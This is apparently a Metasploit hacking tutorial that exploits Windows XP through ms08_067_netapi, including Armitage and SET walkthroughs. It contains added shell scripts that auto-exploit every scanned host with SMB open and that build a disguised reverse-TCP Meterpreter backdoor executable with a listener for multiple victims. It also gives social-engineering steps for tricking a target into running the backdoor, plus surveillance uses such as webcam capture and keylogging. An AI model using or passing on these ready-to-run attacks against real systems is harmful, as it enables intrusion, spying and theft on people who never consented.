To exploit a system with the Metasploit Framework you carry out five steps:
1. Choose and configure a pre-loaded exploit from the database.
2. Check whether the target system is actually susceptible to the exploit (many modules, including the one used below, have a check command for this).
3. Configure a payload.
4. Optionally encode the payload. Encoders were intended to get past signature-based intrusion-prevention systems (IPS) and antivirus; the stock encoders are themselves well known and rarely fool current products, so treat this step as optional rather than as real evasion.
5. Execute the exploit.
To choose an exploit and a payload you need information about the target: which ports are open, what operating system and service versions are running and, ideally, which patches are missing. Port scanning and OS fingerprinting tools such as Nmap, or vulnerability scanners such as Nessus, will give you this. I'll leave the method of information gathering up to you.
Installing the Metasploit Framework depends on your operating system and hardware, so rather than cover every eventuality I have provided links to the Windows and Linux installations:
Linux : LINK…
I would however highly recommend that you download Kali Linux, which comes with the Metasploit Framework already installed.
Metasploit is a great tool and a must-have for all security/penetration testers. I will show you a few ways in which Metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali Linux exploiting a Windows XP SP3 OS.)
First, how to connect to and exploit a target machine using the Metasploit exploit ms08_067_netapi, which targets the 2008 Windows Server service (netapi32) vulnerability that unpatched XP SP3 machines are still open to. Boot up Metasploit with the command msfconsole:
Now we need to set up the Windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp (a bind payload makes the target listen and waits for us to connect in, so the target's firewall must allow that inbound connection; if it does not, use windows/meterpreter/reverse_tcp instead and set LHOST to your own address)
3. set RHOST 192.168.0.10 (this is the target's IP address, taken from your scan; recent Metasploit releases name this option RHOSTS)
4. exploit (this command launches the exploit, as seen below)
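As an added example that is not part of the original post, here is a small shell script joining steps 1 to 3 of the recipe above: it pulls the hosts with TCP 445 open out of an nmap grepable-output (-oG) scan and, for each one, writes a msfconsole resource script that runs the module's check command before exploit, which is the susceptibility test from step 2 of the five-step list. The scan text is a constructed sample, the 192.168.0.x addresses and .rc file names are assumptions, and msfconsole is only invoked when it is actually installed.

```shell
#!/bin/sh
# Added example: from an nmap -oG scan to a msfconsole resource script that
# runs 'check' before 'exploit' for ms08_067_netapi.
# The scan below is a constructed sample, not a real capture.
SAMPLE_SCAN='# Nmap scan (constructed sample)
Host: 192.168.0.10 ()  Status: Up
Host: 192.168.0.10 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  OS: Microsoft Windows XP SP2 or SP3
Host: 192.168.0.20 ()  Status: Up
Host: 192.168.0.20 ()  Ports: 22/open/tcp//ssh///, 445/closed/tcp//microsoft-ds///  OS: Linux 3.X
Host: 192.168.0.30 ()  Status: Up
Host: 192.168.0.30 ()  Ports: 445/open/tcp//microsoft-ds///  OS: Microsoft Windows 7'

# Print the address ($2 of a "Host:" line) of every host whose Ports field
# shows TCP 445 open. A closed or filtered 445 does not match.
hosts_with_445() {
    awk '/Ports:/ && /445\/open\/tcp/ { print $2 }'
}

# Emit the resource script for one target. 'check' asks the module whether
# the host looks vulnerable; read its verdict before letting 'exploit' run.
# RHOST is the option name of this tutorial's era; newer releases use RHOSTS.
write_rc() {
    target=$1
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $target
set payload windows/meterpreter/bind_tcp
check
exploit
EOF
}

# Assumes the scan was saved with:
#   nmap -O -p 139,445 -oG scan.gnmap 192.168.0.0/24
# One .rc file per SMB host; msfconsole is only launched if it is on PATH.
run_against_scan() {
    scan_file=$1
    hosts_with_445 <"$scan_file" | while read -r host; do
        write_rc "$host" >"ms08_067_$host.rc"
        if command -v msfconsole >/dev/null 2>&1; then
            msfconsole -q -r "ms08_067_$host.rc"
        else
            echo "msfconsole not found; wrote ms08_067_$host.rc" >&2
        fi
    done
}

# Demo on the constructed sample: only .10 and .30 have 445 open.
printf '%s\n' "$SAMPLE_SCAN" | hosts_with_445 | while read -r host; do
    write_rc "$host"
    echo
done
```

Run it for real with run_against_scan scan.gnmap after an nmap -oG scan; the check line in each generated script is what tells you, before anything is thrown at the host, whether the module thinks it is patched.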
All being well you are now connected to the target and can run a number of commands. Below is the screenshot command.
And that's it, easy!
There are loads of commands available in the Meterpreter session; type help and a list will be displayed.
Examples are recording audio from the microphone, taking snapshots from the webcam, capturing keystrokes and downloading files.
Social engineering example
Next let's see how to gain access to a target's machine using their interaction. Why? I hear you ask. Well, sometimes it's not possible to connect directly, for whatever reason; let's say "security settings" such as a host firewall that drops our inbound connection. The following attack has the target run our payload, which then connects back out to us.
First things first, bring up a terminal window and type the command se-toolkit (newer releases install it as setoolkit).
Then enter option 1 for Social-Engineering Attacks.
Now choose option 4 to create a payload and listener, and enter your IP address.
Now you need to pick the type of payload; we will go with option 2, Windows Reverse TCP Meterpreter.
Choose option 16, Backdoor Executable.
Leave the port set to 443.
(443 is the HTTPS port, normally carrying encrypted web traffic. The port number itself gives us no protection: this is a plain TCP connection and the reverse_tcp stage is sent unencrypted whatever port it uses. The reason to pick 443 is that almost every firewall allows outbound connections to it, so the callback is far less likely to be blocked than one on 4444. If you want the traffic to actually look like HTTPS, use the reverse_https Meterpreter payload instead.)
And finally start the listener.
OK, so let's recap: we have just created an executable file with a payload hidden inside it. The next part is a little tricky: you need to get the file onto the target computer and get the target to execute it. For example, call it games and give it a nice icon.
Before you send it, navigate to where it was created, right-click and open Properties.
Ticking the box to allow the file to be executed as a program only matters on the Kali side; the Windows target runs the .exe regardless of Linux permission bits, so this step is for testing the file locally, not for the attack itself.
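As an added example that is not part of the original post, the same payload and listener the SET menus produce can be built by hand with msfvenom and the exploit/multi/handler module; seeing the explicit commands makes clear what the menu choices above actually set. The attacker address 192.168.0.5 and the output name games.exe are assumptions; msfvenom and msfconsole are only called when installed, and the listener resource script is printed so you can inspect it before launching anything.

```shell
#!/bin/sh
# Added example: hand-built equivalent of SET's "create a payload and listener".
# 192.168.0.5 (attacker) and games.exe are assumed values; adjust for your lab.
LHOST=${LHOST:-192.168.0.5}
LPORT=${LPORT:-443}
# Windows Reverse TCP Meterpreter (SET option 2). Swap in
# windows/meterpreter/reverse_https if you want the 443 callback to really be
# TLS rather than plain TCP that merely uses the HTTPS port number.
PAYLOAD=${PAYLOAD:-windows/meterpreter/reverse_tcp}
OUT=${OUT:-games.exe}

# Resource script for the listener. payload, LHOST and LPORT must match what
# the executable was built with or the session never comes up.
# ExitOnSession false keeps the handler alive for more than one victim;
# exploit -j runs it as a background job so the console stays usable.
handler_rc() {
    payload=$1; lhost=$2; lport=$3
    cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# Build the executable that carries the payload (the hand-rolled counterpart
# of the Backdoor Executable choice). -f exe emits a stand-alone PE file.
build_exe() {
    payload=$1; lhost=$2; lport=$3; out=$4
    if ! command -v msfvenom >/dev/null 2>&1; then
        echo "msfvenom not found on PATH; skipping build" >&2
        return 1
    fi
    msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f exe -o "$out"
}

# Write the listener script and start it, if msfconsole is available.
start_listener() {
    handler_rc "$PAYLOAD" "$LHOST" "$LPORT" >handler.rc
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r handler.rc
    else
        echo "msfconsole not found; wrote handler.rc" >&2
    fi
}

# Show the listener script that the current settings would produce.
handler_rc "$PAYLOAD" "$LHOST" "$LPORT"
# To build and listen for real:
#   build_exe "$PAYLOAD" "$LHOST" "$LPORT" "$OUT" && start_listener
```

Once the target double-clicks the file, the session appears in the handler's console; sessions -l lists it and sessions -i 1 drops you into the usual meterpreter prompt.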
So now we wait... Once the target executes the program you will see the following:
From here on it's the usual meterpreter > prompt.
As before you can now run commands like screenshot or shell.
The target is yours!
We've seen how to use Metasploit from the command line; now let's see how to achieve the same goal with Armitage, a graphical front end for Metasploit and Meterpreter. Let's get started.
First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start …… This starts the Metasploit server and database.
Then type armitage in the terminal window and accept the default values:
You will probably get a popup asking whether to start Metasploit; click Yes.
You should now see the following:
Don't worry about the connection refused message; it just takes a while to load.
Armitage will now boot up. If it asks for the attack computer's IP, enter your own IP address.
Navigate to Hosts > Nmap Scan > Quick Scan (OS detect).
Armitage will scan a range or a single IP address of your choice and present the results in the black window. Right-click the target and click Scan.
When the scan is complete, expand exploit > windows > smb and double-click ms08_067_netapi.
This brings up an attack confirmation window; check the details and click Launch.
Confirmation of a successful exploit will look like this:
You can now right-click the target and perform multiple commands.
Here is an example of the Interact "remote command shell" option:
As an added extra, Websploit (below) uses exploits from Metasploit and also has features of its own for scanning and analysing remote systems to find vulnerabilities. If you enjoyed this article please comment and I will do one for Websploit. Thank you.
Metasploit is a must-have for anyone interested in the world of security. You have just seen a few ways in which it can be used, but keep in mind that this has only scratched the surface of what the tool can do. To find out more please follow the links below.